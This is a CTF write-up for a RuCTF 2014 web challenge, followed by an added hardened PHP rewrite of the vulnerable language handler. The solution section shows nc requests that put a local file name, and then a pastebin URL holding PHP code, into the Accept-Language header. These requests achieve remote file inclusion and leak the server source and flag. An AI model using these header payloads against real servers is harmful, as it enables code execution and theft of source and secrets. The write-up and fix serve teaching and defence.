Task:
Find the key.
Solution:
Judging by the string "Language was detect automatically :)" in the footer, we realise the thing to dig into is the Accept-Language header.
Let's try:
➜ ~ nc w1.quals.ructf.org 80
GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: index.php

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:18:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: en

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:19:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

65c
<!doctype html>
<html>
<head>
<style type="text/css"> pre { width: 640px; white-space: normal; text-align: justify;}; </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
<style type="text/css"> pre { width: 640px; white-space: normal; text-align: justify;}; </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
....
So the file is being opened with include. Let's try a remote include by putting a trivial <?php echo file_get_contents('index.php'); ?> on pastebin and pointing the header at it:
➜ ~ nc w1.quals.ructf.org 80
GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: http://pastebin.com/raw.php?i=5LYkba4c

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:24:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

357
<!doctype html>
<html>
<head>
<style type="text/css"> pre { width: 640px; white-space: normal; text-align: justify;}; </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
<style type="text/css"> pre { width: 640px; white-space: normal; text-align: justify;}; </style>
</head>
<body>
<center>
<h2>CTF</h2>
<?php
header('Content-Type: text/html; charset=utf-8');
$flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
$ok = 0;
foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    $l = explode(';', $s)[0];
    if (include $l) {
        $ok = 1;
        break;
    }
}
if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
} else {
    echo 'Language was detect automatically :)';
}
?>
<center>
</body>
</html>
Language was detect automatically :)<center>
</body>
</html>
0
Note the line
$flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
profit ;)
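The root cause in the challenge source above is that a raw, attacker-controlled Accept-Language value is passed straight to include, so any local path or (with allow_url_include on) any URL gets executed. The following is an added example, not the challenge's own code, showing how the same language-negotiation feature is written so that the include target can only ever be one of a fixed set of files. The directory ./lang/<code>.php and the allowlist of codes are assumptions for the illustration.

```php
<?php
// Added example (not part of the original writeup): a hardened replacement for
// the Accept-Language handler. Assumed layout: translations live in
// ./lang/<code>.php and the set of supported codes is fixed at deploy time.

declare(strict_types=1);

const LANG_DIR  = __DIR__ . '/lang';      // assumed translation directory
const SUPPORTED = ['en', 'ru', 'de'];      // assumed allowlist of language codes

/**
 * Parse an Accept-Language header into language tags ordered by q-value
 * (highest first, header order as tie-breaker). Only tags matching the
 * RFC 7231 language-range syntax survive, so a path, "../" sequence or URL
 * is discarded here and never reaches include.
 */
function parseAcceptLanguage(string $header): array
{
    $ranges = [];
    foreach (explode(',', $header) as $pos => $item) {
        $parts = array_map('trim', explode(';', $item));
        $tag   = strtolower($parts[0]);
        // Letters and digits separated by hyphens, nothing else.
        if (!preg_match('/^[a-z]{1,8}(-[a-z0-9]{1,8})*$/', $tag)) {
            continue;
        }
        $q = 1.0;
        foreach (array_slice($parts, 1) as $param) {
            if (preg_match('/^q=(0(\.\d{0,3})?|1(\.0{0,3})?)$/', $param, $m)) {
                $q = (float) $m[1];
            }
        }
        if ($q > 0) {
            $ranges[] = ['tag' => $tag, 'q' => $q, 'pos' => $pos];
        }
    }
    usort($ranges, fn($a, $b) => [$b['q'], $a['pos']] <=> [$a['q'], $b['pos']]);
    return array_column($ranges, 'tag');
}

/**
 * Choose the first supported language. The primary subtag is compared against
 * the allowlist, so "en-US" resolves to "en"; when nothing matches, the
 * default is used instead of falling through to an arbitrary include.
 */
function selectLanguage(string $header, array $supported, string $default = 'en'): string
{
    foreach (parseAcceptLanguage($header) as $tag) {
        $primary = explode('-', $tag)[0];
        if (in_array($primary, $supported, true)) {
            return $primary;
        }
    }
    return $default;
}

$lang = selectLanguage($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', SUPPORTED);

// The include target is assembled from an allowlisted value and a fixed
// directory; no byte of the request reaches the filesystem or a URL wrapper.
include LANG_DIR . '/' . $lang . '.php';
```

Two points worth keeping in mind alongside the code: the allowlist check (in_array against a fixed set) is what actually closes the hole, and the regex is only a first filter; and the remote include in the writeup was possible because allow_url_include was enabled, so setting allow_url_include=Off in php.ini (and allow_url_fopen=Off where the application does not need it) removes that class of attack regardless of application bugs.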